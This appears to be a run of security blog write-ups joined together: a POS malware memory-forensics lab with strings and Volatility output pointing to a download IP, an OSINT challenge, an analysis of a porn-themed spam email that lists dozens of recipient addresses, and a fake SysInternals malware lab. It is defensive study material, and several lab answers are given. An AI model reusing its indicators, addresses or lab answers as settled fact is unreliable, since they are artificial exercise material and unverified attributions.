0x000000000005001c 0000             ADD [EAX], AL
0x000000000005001e 0000             ADD [EAX], AL
0x0000000000050020 0000             ADD [EAX], AL
0x0000000000050022 0000             ADD [EAX], AL
0x0000000000050024 0000             ADD [EAX], AL
0x0000000000050026 0000             ADD [EAX], AL
0x0000000000050028 0000             ADD [EAX], AL
0x000000000005002a 0000             ADD [EAX], AL
0x000000000005002c 0000             ADD [EAX], AL
0x000000000005002e 0000             ADD [EAX], AL
0x0000000000050030 0000             ADD [EAX], AL
0x0000000000050032 0000             ADD [EAX], AL
0x0000000000050034 0000             ADD [EAX], AL
0x0000000000050036 0000             ADD [EAX], AL
0x0000000000050038 0000             ADD [EAX], AL
0x000000000005003a 0000             ADD [EAX], AL
0x000000000005003c d800             FADD DWORD [EAX]
0x000000000005003e 0000             ADD [EAX], AL

Then I uploaded it to VirusTotal.

Question 23

Machine:POS In the POS malware whitelist. What application was specific to Allsafecybersec?

Answer 23

So after a little research, this was something that had never crossed my mind. Malware having build in whitelists/blacklists. In order not to disrupt processes on a system to avoid protection and also targeted binaries/files for specific victims. In this case, running strings on the malware gave me the following:

$ strings process.0x83f324d8.0x50000.dmp 
!This program cannot be run in DOS mode.
RichH
.text
.data
.idata
@.rsrc
@.reloc
allsafe_protector.exe
svchost.exe
iexplore.exe
explorer.exe

allsafe_protector.exe.

Question 24

Machine:POS What is the name of the file the malware was initially launched from?

Answer 24

I actually found this answer accidentally before I found the previous one, using strings on the malware for the first time, I used the -el command and it gave me this:

$ strings -el process.0x83f324d8.0x50000.dmp  
s%s\%s
%s\%s\%s.exe
\Internet Explorer\iexplore.exe
jjjjjjjjh
jjjj
jjjj
jjjj
jjjj
jjjh
Digit
.exe
tor.exe
C:\Program Files\Internet Explorer\iexplore.exe
8bc0f102-b56a-4de9-9832-137a2cf08295
C:\Users\pos\AppData\Roaming\kdcpr\kdcpr.exe
C:\Users\pos\Downloads\allsafe_update.exe

allsafe_update.exe in the downloads folder. Which could indicate the initial launch vector. I could have also used the iehistory plugin to find this:

$ python2 vol.py -f dump/pos.vmss --profile=Win7SP1x86_23418 iehistory
Process: 1836 explorer.exe
Cache type "URL " at 0x1db5600
Record length: 0x100
Location: :2015100920151010: pos@http://54.84.237.92/allsafe_update.exe
Last modified: 2015-10-09 08:35:57 UTC+0000
Last accessed: 2015-10-09 12:35:57 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0x0
**************************************************
Process: 1836 explorer.exe
Cache type "DEST" at 0x510182b
Last modified: 2015-10-09 08:35:57 UTC+0000
Last accessed: 2015-10-09 12:35:58 UTC+0000
URL: pos@http://54.84.237.92/allsafe_update.exe
**************************************************
Process: 1836 explorer.exe
Cache type "DEST" at 0x5101b93
Last modified: 2015-10-09 08:35:57 UTC+0000
Last accessed: 2015-10-09 12:35:58 UTC+0000
URL: pos@http://54.84.237.92/allsafe_update.exe

The URLs match up with the C2 servers IP address. Meaning the allsafe_update.exe is the original malware.

This was a tough lab, I needed a couple of nudges in the right direction near the end of the lab. But overall I did learn a few things and it was a rewarding experience!

Scenario

This exercise focuses on Open-Source Intelligence (OSINT) as a method for mining and analyzing publicly available data. It aims to enhance skills in producing valuable insights when investigating external threats in the role of a security blue team analyst. Through practical application, participants will learn to effectively gather and interpret information to improve overall security measures.

Question 1

Who is the Registrar for jameskainth.com?

Answer 1

A Whois search revelaed NameCheap is the registrar.

Question 2

What is the Zoom meeting id of the British Prime Ministers Cabinet Meeting?

Answer 2

Using the phrase “Zoom meeting ID of the British Prime Ministers Cabinet Meeting” on a search engine gave me a few news article detailing what happened.

Question 3

In 1998 specifically on February 12th, Champlain was planning on adding an exciting new building to its campus. Back then, it was called “The Information Commons”. Can you find a picture of what the inside would look like? Submit the SHA256 hash.

Answer 3

Using the way back machine I was able to find a single capture on February 12th 1998.

└─$ shasum -a 256 inside1.jpg                          
f4952b314eb15acf0eec79c954f83881c17d50d2b5922ee37e8fc5e5cd1aeac2  inside1.jpg

Question 4

In 2019 UVM’s Ichthyology Class Had to Name their fish for class. Can you find out what the last person on the public roster named their fish?

Answer 4

Using the wayback machine once again, I was able to uncover a Excel spreadsheet with fish names.

Question 5

Can you identify the state from which this picture was taken? See the attached photo.

Answer 5

I used Google’s Image search to try and find where the photo was taken. Using their AI it managed to pin point Dinosaur Land in White Post Virginia.

Malicious P*rnHub Spam Campaign

The first email I am going to take a look at has the subject line:

To STOP receiving these emails from us just hit reply and let us Know !!

Indicators:

• No logo
• Strange subject line
• Needing to reply to an email to stop receiving them
• Reply address
• No links
• No attachments

This is super strange. I have never seen spam emails that don’t have any sort of malicious links or attachments. Instead the spammer wants you to click on 1 of 2 buttons that direct the victim to reply to a TON of emails.

mailto:support@schwambach.net;admin@libertejuive.me;admin@haikuo.me;lisapsparks122@gmail.com;monicaamden8@gmail.com;media=
market770@gmail.com;makroobmin0@gmail.com;sauermisael272@gmail.com;adanweissnat550@gmail.com;pouroskamryn@gmail.com;stephenmsmith111@gmail.com;aquisto=
n09@gmail.com;hilaliofchsor@gmail.com;mongolis454@gmail.com;kolamipaprat@gmail.com;dhasanhasanin@gmail.com;shayoojulie@gmail.com;bbb1234hh5@gmail.com;=
o12866788542234@gmail.com;o49485114@gmail.com;alinasorkova497@gmail.com;o78372923@gmail.com;hiyo73404@gmail.com;boitajdiiida@gmail.com;yohello119@gmai=
l.com;habalstdophabala@gmail.com;farenukvova@gmail.com;rebeccafriffin@gmail.com;sykescallum060@gmail.com;c.smithmatthew@gmail.com;kabyalaabsabs@gmail.=
com;dreda4488@gmail.com;luskmirian@gmail.com;edwaardavis@outlook.com;abdoalam644@gmail.com;hodgesantonio11@gmail.com;chiwchiw723@gmail.com;herrodvinni=
e443@gmail.com;wchtabreerd@gmail.com;kamronnatalia661@gmail.com;oliviaprince488@gmail.com;ethandaviss@outlook.com;sabmlevspec@onet.pl;sfigaoprgovisovu
@onet.pl;stepan.dolgoruk496@yandex.ru;slobodyanyuk.83287@yandex.ru;sanych1959942@yandex.ru;mariabugaeva24571@yandex.ru;alla.rykodelnica648@yandex.ru;amanigio@aliyun.com

It uses mailto: and sets the subject line as “Unsubscribe P*rnHub”. This is all hidden behind a simple button. There are 2 of these, one of which is so “confirm” your sub, the second is to “cancel” your sub. This very much plays on peoples perhaps nervousness when dealing with adult content.

The email domains that I have an interest in are as follows:

schwambach.net
libertejuive.me
haikuo.me
onet.pl
aliyun.com

The rest are either, Gmail, Outlook or Yandex emails. More on these domains later. I want to go over the rest of the email for additional clues.

Another thing that stuck out to me was the actual senders address. Using phishtool.com I was able to quickly look over the various interesting details without having to scrub through it manually. The return path was a valid address, which was odd to me. Since a lot of the time spam emails try and spoof. But this was from a Firebase app.

Firebase is Google’s mobile and web app development platform. Sadly the site had not been set up yet.

Because it was a valid address, the spammer would have gotten around SPF and DKIM checks. Now to look into the URLs that the email has you reply to.

schwambach.net

The above URL leads to a index of page. The IP is located in Paris France and was registered via NameCheap. Searching for that IP address it seems its being used by a variety of other domains.

3 of which I have already seen:

schwambach.net
libertejuive.me
haikuo.me

So these 3 are connected via the same server. The following are old results from the same IP address that had been scanned in the past:

You can guess the content of these website, just judging by the name. So to me currently, this looks like an old phishing/malicious server being used for a new scam. The IP address is also being tracked of VirusTotal. The various URLs that are connected with the above IP addresses are a ton of malicious content, which seems to be a lot of drive-by downloads.

There were 2 other domains that are also listed within the email:

@onet.pl
@aliyun.com

The first one, onet.pl seems to be a Polish news website that, according to wiki, reaches 42% of Polish internet users every week. A very strange thing to include in the spam email, perhaps the 2 emails that end in onet.pl are compromised somehow?

Both of those onet.pl emails exist and are valid. Which does lead me to believe they might be compromised somehow. I have contacted the website to see if they are aware of such an issue.

The last URL that I wanted to look into was:

aliyun.com

This didn’t take much research, it turned out to be Alibaba’s cloud computing company. Sort of a dead end, a rather strange dead end.

This was an odd spam email, that relies on someones embarrassment of adult content in order to trick them into replying to the list of email addresses above. Not really knowing the rest, I would imagine the scam would start after the first reply, potentially black mail, or even a link to a URL to “cancel” your subscription. Tricking the email client into placing the correspondence into the inbox itself, not the spam box. Thus giving a slight air of authenticity.

Recommendations

Block the following email domains:

schwambach.net
libertejuive.me
haikuo.me

Scenario

A user thought they were downloading the SysInternals tool suite and attempted to open it, but the tools did not launch and became inaccessible. Since then, the user has observed that their system has gradually slowed down and become less responsive.

Question 1

What was the malicious executable file name that the user downloaded?

Answer 1

Navigating through the file system in FTK Imager I was able to find the download that was mentioned in the above scenario.

Question 2

When was the last time the malicious executable file was modified?

Answer 2

While the timestamp is in a 12 hour clock format, the answer requires a 24 hour clock format.

Question 3

What is the SHA1 hash value of the malware?

Answer 3

Right clicking on the malware and exporting the hash is a clean safe way of obtaining a SHA1 hash value. This also allows you to look it up on VirusTotal. However this wasn’t the case here. I needed to look into the Amcache file that records exes that were executed on the system. Using Eric Zimmerman’s AmcacheParser to convert the hve file to a csv. Giving me the following:

2022-11-15 21:19:01,fa1002b02fc5551e075ec44bb4ff9cc13d563dcf,False,c:\users\public\downloads\sysinternals.exe,SysInternals.exe

Question 4

Based on the Alibaba vendor, what is the malware’s family?

Answer 4

Now I can take the SHA1 hash to VirusTotal:

Question 5

What is the first mapped domain’s Fully Qualified Domain Name (FQDN)?

Answer 5

Looking under the relations tab reveals the answer:

Question 6

The mapped domain is linked to an IP address. What is that IP address?

Answer 6

There was one place that sprung to mind when thinking about IP addresses and where they can be stored in the Windows file system. The host file.

Navigating to the following, I was able to obtain the IP address of the URL above:

Windows/System32/drivers/etc/hosts

Question 7

What is the name of the executable dropped by the first-stage executable?

Answer 7

Looking through the VirusTotal page on the behavior tab you can find that the malware drops another exe file, vmtoolsio.exe.

Question 8

What is the name of the service installed by 2nd-stage executable?

Answer 8

In the same command line its clear that the service started is VMwareIOHelperService: